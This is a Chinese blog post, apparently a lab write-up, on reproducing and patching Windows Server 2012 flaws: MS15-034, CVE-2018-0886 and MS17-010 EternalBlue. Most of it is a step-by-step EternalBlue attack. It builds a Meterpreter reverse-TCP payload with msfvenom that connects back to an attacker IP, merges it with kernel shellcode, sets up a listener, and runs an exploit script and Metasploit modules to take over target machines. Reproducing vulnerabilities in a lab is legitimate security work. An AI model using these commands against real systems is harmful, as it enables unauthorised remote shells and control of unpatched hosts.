windows server 2012主机漏洞-复现-修复

windows server 2012主机漏洞

Microsoft Windows HTTP.sys远程代码执行漏洞 (MS15-034)(CVE-2015-1635)

先看服务器是否需要iis服务器,不需要 就不用处理此漏洞

wDs31e.png

复现

使用curl 工具 测试

curl http://192.168.68.200 -H "Host: 192.168.68.200" -H "Range: bytes=0-18446744073709551615"

出现Requested Range Not Satisfiable说明存在此漏洞

非补丁解决办法

Microsoft Windows CredSSP 远程执行代码漏洞(CVE-2018-0886)

远程链接漏洞,有一方没有更新此漏洞 ,在远程连接是会显示身份验证错误

漏洞公告

漏洞补丁

Microsoft Windows SMB 远程代码执行漏洞(CVE-2017-0148)(MS17-010)

使用kali,利用漏洞攻击靶机

129 的是win7的 200的是server2012的

靶机winserver 2012

靶机需要

  • 关闭防火墙

  • 打开来宾账号

kali需要

  • python工具(主要需要 impacket,pycrypto 模块)

  • nasm 是一款基于80x86和x86-64平台的汇编语言编译程序,其设计初衷是为了实现编译器程序跨平台和模块化的特性

  • eternalblue_kshellcode_x64.asm(Sleepya开发的内核shellcode)

  • ternalblue_exploit8.py(Sleepya开发的漏洞利用的python程序)

wget 或者xftp 拿到 eternalblue_kshellcode_x64.asm文件

#使用nasm 编译
nasm -f bin eternalblue_kshellcode_x64.asm

再使用msfVENOM生成一个用户的反弹shellcode攻击载荷

msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o meterpreter_msf.bin EXITFUNC=thread LHOST=192.168.68.128 LPORT=9090

合并内核shellcode和payload

cat eternalblue_kshellcode_x64 meterpreter_msf.bin > metasploit_msf.bin

设置监听

msfconsole
#使用handler模块
use exploit/multi/handler
#设置载荷
set PAYLOAD window/x64/meterpreter/reverse_tcp
#设置攻击机ip 和端口
set lhost 192.168.68.128
set lport 9090
#攻击
exploit

再开一个命令窗口

python eternalblue_exploit8.py 192.168.68.200 metasploit_msf.bin 400

如果报缺少模块的错误

需要安装模块

#下载
wget  https://files.pythonhosted.org/packages/23/18/611a288acba72f59dce509cc3e68fe390d3bdaa00ce4d0b4686e599c951b/impacket-0.9.12.tar.gz
#解压
tar zxvf impacket-0.9.12.tar.gz
#进入解压目录安装
cd impacket-0.9.12
python setup.py install
#同时还需要pycrypto模块
pip install pycrypto --index-url http://mirrors.aliyun.com/pypi/simple/ --trusted-host mirrors.aliyun.com
(pip是python的包管理工具 没有的 可以执行 apt-get install python-pip)

如果没有收到反弹的shell或者出现蓝屏重启,可以增加或减少数值

wWuzi4.jpg

wWKSJJ.jpg

wWiklD.png

安装补丁

wWnB3n.jpg

继续使用kali攻击 未出现蓝屏重启的情况

靶机 win7 x64作为靶机进行攻击。

nmap 192.168.68.*
#扫描

wWmf6P.jpg

#进入msfconsole 
msfconsole  
#查找ms17-010漏洞模块
search ms17-010
#使用扫描模块进行漏洞扫描
use auxiliary/scanner/smb/smb_ms17_010
#设置靶机ip
set rhost 192.168.68.129
#查看属性
show options
#开始扫描
run

wWmVoQ.jpg

可以看到 疑似存在 ms17-010漏洞 接着可以攻击

#使用攻击模块
use exploit/windows/smb/ms17_010_eternalblue
#设置靶机ip
set rhost 192.168.68.129
#查看属性 
options
#攻击
run

wWZ2AH.jpg

可以看到已经获取靶机权限

公告地址

漏洞补丁地址

  • 5
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值